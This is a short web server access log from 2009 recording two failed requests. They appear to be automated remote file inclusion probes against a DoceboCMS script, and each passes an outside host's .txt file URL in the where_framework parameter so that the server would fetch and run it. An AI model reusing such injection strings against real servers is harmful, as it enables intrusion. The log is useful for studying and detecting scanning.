62.140.23.192 - - [28/Oct/2009:00:43:07 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.140.23.192 - - [28/Oct/2009:00:43:07 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
